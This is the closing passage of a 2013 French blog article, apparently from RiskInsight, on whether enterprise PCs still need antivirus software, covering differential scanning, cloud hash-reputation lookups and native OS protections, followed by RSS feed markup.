<p>Plusieurs initiatives de grands comptes visant à diminuer leur fréquence ont d’ailleurs vu le jour.Elles n’ont jamais abouti, tant ces scans paraissent aujourd’hui encore  nécessaires &#8211; ne serait-ce que dans un rôle de « voiture-balai » afin de nettoyer le résidu récurrent de logiciels malveillants en tout genre. En revanche, une approche réaliste pour réduire le temps de scan est possible : réaliser un scan différentiel. Seuls les fichiers modifiés par rapport à la semaine précédente sont scannés.</p>
<h2><strong> </strong>Le futur des antivirus est… dans le Cloud !</h2>
<p><strong> </strong>Pour autant, les limites des antivirus ne font que s’affirmer depuis des années :</p>
<ul>
<li> Les malwares sont de plus en plus complexes, leurs variantes innombrables, et même les éditeurs les plus réactifs ne sont plus capables de suivre la cadence.</li>
</ul>
<ul>
<li>Dans les meilleurs cas, les définitions virales sont mises à jour quotidiennement sur les postes de travail : c’est déjà trop au vu des vitesses de propagation.</li>
</ul>
<p>Un problème d’historique apparaît également : comment cumuler toutes les définitions de virus anciens et nouveaux, sans que la taille des fichiers contenant ces définitions n’explose, ralentissant encore le poste de travail, tout en nécessitant de plus en plus de temps à déployer ?</p>
<p>Les éditeurs d’antivirus commencent à proposer une réponse à ces problématiques, à travers le Cloud. Plutôt que de scanner un fichier sur le poste de travail, il s’agit d’en faire un hash (empreinte unique pour chaque fichier), qui est envoyé sur un serveur de l’éditeur, dans le Cloud. Il est alors comparé à une base de données mondiale, et peut même faire l’objet d’une note de « réputation » selon sa probabilité d’être ou non malveillant. L’information est alors renvoyée à l’antivirus sur le PC, qui prend les actions nécessaires le cas échéant.</p>
<p>Cette méthode prometteuse a toutefois ses contraintes : la nécessité d’une connexion internet, de qualité et le manque de maîtrise de la réaction de l’antivirus en cas de faux positif.</p>
<h2> Des changements de plateforme structurants</h2>
<p><strong> </strong>Un dernier élément vient s’ajouter à la question de l’évolution des antivirus : il s’agit de l’évolution des systèmes d’exploitation eux-mêmes.</p>
<p>Les OS modernes intègrent en effet un certain nombre de mécanismes de sécurité natifs, qui rendent les attaques plus difficiles : isolement inter-applicatif, applications et drivers signés, mécanismes de cryptographie…</p>
<p><strong> </strong>Les deux principales plateformes mobiles en sont un bon exemple : tandis que l’efficacité des rares antivirus reste à démontrer sur Android, ils sont tout simplement interdits par Apple sur iOS. Pourtant, à part quelques vulnérabilités médiatisées, les cas d’infection dans le cadre d’une utilisation normale sont anecdotiques.</p>
<p>Ceci reste cependant à nuancer : les attaquants évaluent au final les coûts/bénéfices de chaque type d’attaque. Lorsque le développement de virus sur smartphone sera plus lucratif que l’exploitation d’une faille de navigateur Web, il deviendra sans doute à la mode…</p>
<p>Le cas de Windows 8 est encore différent : s’il dispose d’un environnement « nouvelle génération » avec les applications du Windows Store, il propose une rétrocompatibilité avec les programmes plus anciens… y compris malveillants.</p>
<p>N’enterrez donc pas tout de suite votre antivirus, il pourrait encore vous servir pendant des années !</p>
<p><strong> </strong></p>
<p><strong> </strong></p>
<p>&nbsp;</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2013/05/un-antivirus-sur-votre-pc-entreprise-en-2013-pour-quoi-faire/">Un antivirus sur votre PC entreprise en 2013 ? Pour quoi faire ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
